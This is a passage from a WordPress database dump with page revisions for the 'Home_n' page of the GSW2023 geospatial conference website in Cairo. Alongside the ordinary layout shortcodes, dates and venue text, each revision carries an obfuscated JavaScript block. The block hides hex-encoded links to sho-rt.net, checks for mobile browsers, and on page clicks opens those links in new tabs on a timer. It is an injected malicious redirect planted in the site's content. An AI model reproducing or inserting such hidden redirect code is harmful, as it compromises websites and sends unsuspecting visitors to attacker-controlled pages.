)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 20:00:08','2022-11-09 20:00:08','',3066,'https://gsw2023.com/?p=3209',0,'revision','',0),
(3210,1,'2022-11-09 20:10:44','2022-11-09 20:10:44','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_fancytext fancytext_prefix=\"GSW2023 Venue\" fancytext_align=\"left\" strings_textspeed=\"35\" strings_backspeed=\"0\" typewriter_loop=\"off\" typewriter_cursor=\"off\" fancytext_strings=\"GSW2023 Venue\r\n\" fancytext_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 20:10:44','2022-11-09 20:10:44','',3066,'https://gsw2023.com/?p=3210',0,'revision','',0),
(3211,1,'2022-11-09 20:15:56','2022-11-09 20:15:56','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator 